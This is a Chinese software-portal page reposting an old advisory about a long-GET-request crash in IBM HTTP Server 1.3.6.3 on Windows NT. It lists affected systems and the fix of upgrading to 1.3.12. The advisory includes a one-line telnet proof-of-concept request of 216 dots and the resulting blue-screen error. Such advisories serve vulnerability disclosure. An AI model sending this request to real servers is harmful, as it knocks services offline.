设为首页
联系我们
加入收藏
| 网络工具 | 系统工具 | 应用软件 | 多媒体类 | 联络聊天 | 行业软件 | 图形图像 | 安全相关 | 编程开发 | 教育教学 | 游戏娱乐 |
| 程序源码 | ASP 源码 | CGI 源码 | PHP 源码 | 驱动下载 | 字体下载 | 素材下载 | 桌面大全 | 闪客天地 | 外挂插件 | 考题下载 |

站内搜索:

您的位置:首页-> 资讯中心-> 技术开发-> JSP 学院-> JSP安全-> 通过提交超长的GET请求导致IBM HTTP Server远程溢出

JSP安全

JSP教程
JSP文摘
JSP实例
JSP FAQ
JSP安全

本类阅读TOP10

·JRun 2.3.x 范例文件暴露站点安全信息
·Resin 1.2 重要源代码暴露漏洞
·iPlanet Web Server 缓冲区溢出漏洞
·站内搜索脚本例子五(JavaScript)
·通过提交超长的GET请求导致IBM HTTP Server远程溢出
·Jsp安全性初探
·IBM WebSphere Application Server 3.0.2 存在暴露源代码漏洞
·BEA WebLogic 暴露源代码漏洞
·Allaire JRUN 2.3远程执行任意命令漏洞
·Sun Java Web Server 能让攻击者远程执行任意命令

精品推荐

通过提交超长的GET请求导致IBM HTTP Server远程溢出

作者:未知 来源:未知 加入时间:2004-12-1

涉及程序:
GET

描述:
通过提交超长的GET请求导致IBM HTTP Server远程溢出


详细:
IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。

如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


$ telnet target 80
GET /......(216个".")aaa HTTP/1.0

则系统会报告下列错误信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
注意:目标主机运行在Windows 2000下。

受影响的系统
IBM HTTP Server 1.3.6.3
- TurboLinux Turbo Linux 3.0.1
- Sun Solaris 2.6
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- Microsoft Windows NT 4.0
- IBM AIX 4.2.1
- Caldera OpenLinux 2.2

解决方案:
IBM 已经在 1.3.12 版本中解决了此问题,下载地址:
http://www-4.ibm.com/software/webservers/httpservers/download.html

(出处:不详 )





相关文章
相关软件